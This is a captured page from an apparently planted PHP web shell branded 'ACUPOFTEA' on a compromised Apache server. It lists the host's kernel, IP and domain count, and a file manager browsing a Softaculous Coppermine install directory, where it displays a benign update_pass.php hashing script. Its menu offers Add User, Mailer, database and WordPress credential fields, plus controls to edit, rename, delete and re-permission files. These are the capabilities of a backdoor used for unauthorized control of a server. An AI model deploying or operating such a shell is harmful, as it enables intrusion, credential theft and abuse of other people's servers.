System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
var
/
softaculous
/
cpg
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
update_pass.php
<?php @unlink('update_pass.php'); function __pbkdf2($algorithm, $password, $salt, $count, $key_length, $raw_output = false){ if (function_exists("hash_pbkdf2")) { // The output length is in NIBBLES (4-bits) if $raw_output is false! if (!$raw_output) { $key_length = $key_length * 2; } return hash_pbkdf2($algorithm, $password, $salt, $count, $key_length, $raw_output); } $hash_length = strlen(hash($algorithm, "", true)); $block_count = ceil($key_length / $hash_length); $output = ""; for($i = 1; $i <= $block_count; $i++) { // $i encoded as 4 bytes, big endian. $last = $salt . pack("N", $i); // first iteration $last = $xorsum = hash_hmac($algorithm, $last, $password, true); // perform the other $count - 1 iterations for ($j = 1; $j < $count; $j++) { $xorsum ^= ($last = hash_hmac($algorithm, $last, $password, true)); } $output .= $xorsum; } if($raw_output) return substr($output, 0, $key_length); else return bin2hex(substr($output, 0, $key_length)); } $thumb_method = ''; if (function_exists("imagecreate") && function_exists("imagejpeg")) { $thumb_method = 'gd2'; $im = imagecreate(1, 1); $tst_image = "[[softpath]]/albums/userpics/gd1.jpg"; imagejpeg($im, $tst_image); $size = @getimagesize($tst_image); unlink($tst_image); $gd1_installed = ($size[2] == 2); $im = imagecreatetruecolor(1, 1); $tst_image = "[[softpath]]/albums/userpics/gd2.jpg"; imagejpeg($im, $tst_image); $size = @getimagesize($tst_image); unlink($tst_image); $gd2_installed = ($size[2] == 2); if(!$gd2_installed && $gd1_installed){ $thumb_method = 'gd1'; } } if (function_exists('random_bytes')) { $vect = random_bytes(24); } else { $vect = mcrypt_create_iv(24, MCRYPT_DEV_URANDOM); } $salt = base64_encode($vect); $resp = base64_encode(__pbkdf2("sha256", '[[admin_pass]]', $salt, 1000, 24, true)); echo $salt.'SOFTACULOUS'.$resp.'SOFTACULOUS'.$thumb_method; ?>
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
..
DIR
-
drwxr-xr-x
2025-10-25 09:38:52
images
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
php53
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
php56
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
php71
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
php81
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
php82
DIR
-
drwxr-xr-x
2025-09-05 09:38:24
_update.php
text/x-php
32.32 KB
-rw-r--r--
2021-12-23 06:54:36
changelog.txt
text/plain
19.44 KB
-rw-r--r--
2025-07-21 05:47:14
clone.php
text/x-php
5.07 KB
-rw-r--r--
2025-09-05 04:25:22
config.inc.php
text/x-php
462 B
-rw-r--r--
2021-12-23 06:54:36
edit.php
text/x-php
5.91 KB
-rw-r--r--
2025-09-05 04:25:22
edit.xml
text/html
433 B
-rw-r--r--
2021-12-23 06:54:36
extend.php
text/x-php
1.84 KB
-rw-r--r--
2025-09-05 04:25:22
fileindex.php
text/plain
1001 B
-rw-r--r--
2021-12-23 06:54:36
import.php
text/x-php
3.16 KB
-rw-r--r--
2025-09-05 04:25:22
info.xml
text/html
4.33 KB
-rw-r--r--
2025-09-05 04:24:18
install.js
text/plain
1.07 KB
-rw-r--r--
2021-12-23 06:54:36
install.php
text/x-php
5.31 KB
-rw-r--r--
2025-09-05 04:25:22
install.xml
text/html
1.06 KB
-rw-r--r--
2021-12-23 06:54:36
md5
text/plain
1.26 KB
-rw-r--r--
2025-09-05 04:25:22
notes.txt
text/plain
430 B
-rw-r--r--
2021-12-23 06:54:36
update.php
text/x-php
32.33 KB
-rw-r--r--
2021-12-23 06:54:36
update_pass.php
text/x-php
2.04 KB
-rw-r--r--
2021-12-23 06:54:36
upgrade.php
text/x-php
4.28 KB
-rw-r--r--
2025-09-05 04:25:22
upgrade.xml
text/plain
625 B
-rw-r--r--
2021-12-23 06:54:36
~ ACUPOFTEA - mail.ontime-ae.com